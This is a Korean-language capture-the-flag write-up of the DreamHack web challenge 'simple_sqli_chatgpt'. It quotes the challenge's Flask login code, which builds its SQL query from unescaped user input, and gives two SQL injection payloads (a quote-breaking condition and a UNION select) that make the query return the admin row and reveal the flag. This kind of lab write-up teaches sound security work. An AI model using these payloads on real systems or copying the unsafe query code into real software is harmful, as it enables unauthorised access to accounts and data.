[DreamHack] [web] [Level 1] simple_sqli_chatgpt 풀이

배울내용 : 

dreamhack,

web hacking,

개발자도구,

dreamhack 풀이,

dreamhack simple_sqli_chatgpt  문제,

dreamhack web 풀이 ,

simple_sqli_chatgpt,

sql injection ,

union injection

 

 

 

문제

 

 

 

 

 

이번에는 아래처럼 userlevel 만 입력하고 Login 버튼만 있다 0 을 입력하니 hello guest 만 뜨는데 여기서 admin 을 뛰우면 될것같다 힌트가 있는지 코드를 확인해보자 

 

 
 
@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userlevel = request.form.get('userlevel')
        res = query_db(f"select * from users where userlevel='{userlevel}'")
        if res:
            userid = res[0]
            userlevel = res[2]
            print(userid, userlevel)
            if userid == 'admin' and userlevel == 0:
                return f'hello {userid} flag is {FLAG}'
            return f'<script>alert("hello {userid}");history.go(-1);</script>'
        return '<script>alert("wrong");history.go(-1);</script>'

app.run(host='0.0.0.0', port=8000)

 

 

중요한 부분만 보면 조건문에 userid 가 admin 이고 userlevel 이 0 이여야한다

그러면 위에 보이는 userlevel 에 입력값을 이용해 SQL injection 을 사용하여 입력값에 없는 admin 을 추가해주면 된다 

 

첫번째 방법은 SQL injection 방법으로 admin 을 추가해주면된다 

0'and userid='admin

 

두번째 방법도 비슷한데 쿼리문이 살짝틀리다 (union 이용시)

' union select * from users;--

 

 

 

 

위에 것을 입력하고 넣으면 기존에 0만 넣었을때는 아래와 같고 

select * from users where userlevel='0'

 

위에 같이 admin 을 추가해주면 아래와 같이 만들어지고 이는 조건문에 만족하기 때문에 플레그를 리턴해준다. 

 

select * from users where userlevel='0' AND userid='admin'

 

그러면 성공적으로 플레그를 뛰울수있게 된다